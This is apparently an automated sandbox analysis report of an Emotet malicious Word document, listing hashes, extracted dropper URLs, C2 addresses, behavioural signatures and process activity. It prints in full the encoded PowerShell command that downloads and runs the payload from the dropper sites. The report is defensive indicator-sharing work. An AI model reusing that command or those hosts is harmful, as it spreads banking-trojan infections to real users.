emotet | 3b37651a73e7c5c4c966ac34a4b38a9e69d7eed9f17e276b8f84f43749cfc70f

General

Target

3b37651a73e7c5c4c966ac34a4b38a9e69d7eed9f17e276b8f84f43749cfc70f.doc
Size

171KB
MD5

466afe7cc13f45b746ed3749deaf9f2c
SHA1

e042d4e1961fecab96420ba43d607667cd149032
SHA256

3b37651a73e7c5c4c966ac34a4b38a9e69d7eed9f17e276b8f84f43749cfc70f
SHA512

68b46c4b8c37e6e14795baeaf862c8d307a06b41708879497c00585c9d39b27887488e7aa1c7abb5059d1fc2e3e4028d0640bb22ba08d327a7cdfdfb2975eb87

Score

10^/10

trojan banker emotet

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://bunchproperties.com/lyhvmiq/s_ia_4uaq/

exe.dropper

http://badeggdesign.com/cgi-bin/nxr5_o_d6vmj/

exe.dropper

http://calledtochange.org/calledtochange/0_76zqg_bwnxpr84/

exe.dropper

http://www.cinefamily.org/phpMyAdmin-4.7.9-all-languages/5um_oot_hz8/

exe.dropper

http://bodbderg.net/wp-admin/ogfv5_4_x2l/

Extracted

Family

emotet

C2

76.27.179.47:80

212.51.142.238:8080

189.212.199.126:443

61.19.246.238:443

162.154.38.103:80

91.211.88.52:7080

83.110.223.58:443

124.45.106.173:443

116.203.32.252:8080

109.117.53.230:443

5.196.74.210:8080

75.139.38.211:80

168.235.67.138:7080

176.111.60.55:8080

169.239.182.217:8080

74.208.45.104:8080

31.31.77.83:443

222.214.218.37:4143

37.139.21.175:8080

91.205.215.66:443

rsa_pubkey.plain

Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powersheLL.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1108 744 powersheLL.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powersheLL.exe

description pid process

Token: SeDebugPrivilege 1108 powersheLL.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powersheLL.exeKBDFI.exe

pid process

1108 powersheLL.exe
1108 powersheLL.exe
1604 KBDFI.exe
1604 KBDFI.exe
Executes dropped EXE 2 IoCs

Processes:

853.exeKBDFI.exe

pid process

1792 853.exe
1604 KBDFI.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1108	744	powersheLL.exe

description	pid	process
Token: SeDebugPrivilege	1108	powersheLL.exe

pid	process
1108	powersheLL.exe
1108	powersheLL.exe
1604	KBDFI.exe
1604	KBDFI.exe

pid	process
1792	853.exe
1604	KBDFI.exe

Emotet Payload 2 IoCs

Detects Emotet payload in memory.

Processes:

resource	yara_rule
behavioral1/memory/1792-12-0x0000000000290000-0x000000000029C000-memory.dmp	emotet
behavioral1/memory/1604-16-0x00000000004A0000-0x00000000004AC000-memory.dmp	emotet

Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1064 WINWORD.EXE
Blacklisted process makes network request 1 IoCs

Processes:

powersheLL.exe

flow pid process

5 1108 powersheLL.exe

pid	process
1064	WINWORD.EXE

flow	pid	process
5	1108	powersheLL.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

853.exe

description	pid	process	target process
PID 1792 wrote to memory of 1604	1792	853.exe	KBDFI.exe
PID 1792 wrote to memory of 1604	1792	853.exe	KBDFI.exe
PID 1792 wrote to memory of 1604	1792	853.exe	KBDFI.exe
PID 1792 wrote to memory of 1604	1792	853.exe	KBDFI.exe

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{55EC0E44-5A53-4CC1-A2AB-6A0219BA7596}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{55EC0E44-5A53-4CC1-A2AB-6A0219BA7596}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib\{55EC0E44-5A53-4CC1-A2AB-6A0219BA7596}\2.0\HELPDIR	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{55EC0E44-5A53-4CC1-A2AB-6A0219BA7596}\2.0\FLAGS	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{55EC0E44-5A53-4CC1-A2AB-6A0219BA7596}\2.0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE

Drops file in System32 directory 2 IoCs

Processes:

powersheLL.exe853.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powersheLL.exe
File opened for modification	C:\Windows\SysWOW64\SystemPropertiesHardware\KBDFI.exe	853.exe

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

WINWORD.EXE853.exeKBDFI.exe

pid process

1064 WINWORD.EXE
1064 WINWORD.EXE
1792 853.exe
1792 853.exe
1604 KBDFI.exe
1604 KBDFI.exe

pid	process
1064	WINWORD.EXE
1064	WINWORD.EXE
1792	853.exe
1792	853.exe
1604	KBDFI.exe
1604	KBDFI.exe

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\3b37651a73e7c5c4c966ac34a4b38a9e69d7eed9f17e276b8f84f43749cfc70f.doc"
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1064

C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
powersheLL -e JABVAEYAQgBJAEkAbABpAGkAPQAnAEcASABBAE8ARQBsAHoAbwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAQwBVAGAAUgBpAGAAVABgAFkAUABSAG8AYABUAG8AQwBvAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABTAFcARQBSAEwAcQBiAHoAIAA9ACAAJwA4ADUAMwAnADsAJABIAEcATgBQAEsAcwB1AG0APQAnAE0ASABYAFoAQwBkAGcAbAAnADsAJABOAFQAVwBYAFoAbgBqAHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFMAVwBFAFIATABxAGIAegArACcALgBlAHgAZQAnADsAJABGAEsATABQAFIAbgBjAHAAPQAnAEUAUgBUAFMAWAB1AG8AcwAnADsAJABKAEQAVQBGAEIAdABjAHAAPQAuACgAJwBuAGUAJwArACcAdwAtACcAKwAnAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAEIAQwBMAGkAZQBOAFQAOwAkAEUARgBCAFkASABoAG4AaQA9ACcAaAB0AHQAcAA6AC8ALwBiAHUAbgBjAGgAcAByAG8AcABlAHIAdABpAGUAcwAuAGMAbwBtAC8AbAB5AGgAdgBtAGkAcQAvAHMAXwBpAGEAXwA0AHUAYQBxAC8AKgBoAHQAdABwADoALwAvAGIAYQBkAGUAZwBnAGQAZQBzAGkAZwBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AbgB4AHIANQBfAG8AXwBkADYAdgBtAGoALwAqAGgAdAB0AHAAOgAvAC8AYwBhAGwAbABlAGQAdABvAGMAaABhAG4AZwBlAC4AbwByAGcALwBjAGEAbABsAGUAZAB0AG8AYwBoAGEAbgBnAGUALwAwAF8ANwA2AHoAcQBnAF8AYgB3AG4AeABwAHIAOAA0AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYwBpAG4AZQBmAGEAbQBpAGwAeQAuAG8AcgBnAC8AcABoAHAATQB5AEEAZABtAGkAbgAtADQALgA3AC4AOQAtAGEAbABsAC0AbABhAG4AZwB1AGEAZwBlAHMALwA1AHUAbQBfAG8AbwB0AF8AaAB6ADgALwAqAGgAdAB0AHAAOgAvAC8AYgBvAGQAYgBkAGUAcgBnAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwBvAGcAZgB2ADUAXwA0AF8AeAAyAGwALwAnAC4AIgBzAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAUABRAFEATgB6AHAAdwA9ACcASgBIAFkASwBZAGEAZwBqACcAOwBmAG8AcgBlAGEAYwBoACgAJABEAFQATgBCAEMAZgBiAHEAIABpAG4AIAAkAEUARgBCAFkASABoAG4AaQApAHsAdAByAHkAewAkAEoARABVAEYAQgB0AGMAcAAuACIAZABPAHcATgBgAEwAbwBgAEEAZABgAEYASQBsAEUAIgAoACQARABUAE4AQgBDAGYAYgBxACwAIAAkAE4AVABXAFgAWgBuAGoAeAApADsAJABDAFMAUABBAE0AdQBkAHEAPQAnAFoAVABLAEQATABrAGkAegAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAE4AVABXAFgAWgBuAGoAeAApAC4AIgBMAEUATgBgAGcAYABUAEgAIgAgAC0AZwBlACAAMwA2ADQANwA1ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAGAAUgBlAGEAYABUAEUAIgAoACQATgBUAFcAWABaAG4AagB4ACkAOwAkAFAAWABMAFoAVQB1AHQAaAA9ACcAVABUAFQATABOAGkAbQBhACcAOwBiAHIAZQBhAGsAOwAkAEcAQwBXAE0AVwBlAHEAYwA9ACcARwBXAE8AQwBZAGUAZgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAUwBVAEYAVABtAG0AeAA9ACcARwBJAFcAVQBZAGoAZAB0ACcA
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in System32 directory
PID:1108

C:\Users\Admin\853.exe
C:\Users\Admin\853.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1792

C:\Windows\SysWOW64\SystemPropertiesHardware\KBDFI.exe
"C:\Windows\SysWOW64\SystemPropertiesHardware\KBDFI.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1604

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\853.exe

Download Submit
C:\Users\Admin\853.exe

Download Submit
C:\Windows\SysWOW64\SystemPropertiesHardware\KBDFI.exe

Download Submit
memory/1064-2-0x0000000008A30000-0x0000000008A34000-memory.dmp

Filesize
16KB

Download
memory/1064-4-0x0000000006E70000-0x0000000007070000-memory.dmp

Filesize
2.0MB

Download
memory/1064-5-0x000000000AEF0000-0x000000000AEF4000-memory.dmp

Filesize
16KB

Download
memory/1064-6-0x000000000BF70000-0x000000000BF74000-memory.dmp

Filesize
16KB

Download
memory/1064-10-0x0000000002180000-0x0000000002181000-memory.dmp

Filesize
4KB

Download
memory/1604-14-0x0000000000000000-mapping.dmp

Download
memory/1604-16-0x00000000004A0000-0x00000000004AC000-memory.dmp

Filesize
48KB

Download
memory/1792-12-0x0000000000290000-0x000000000029C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads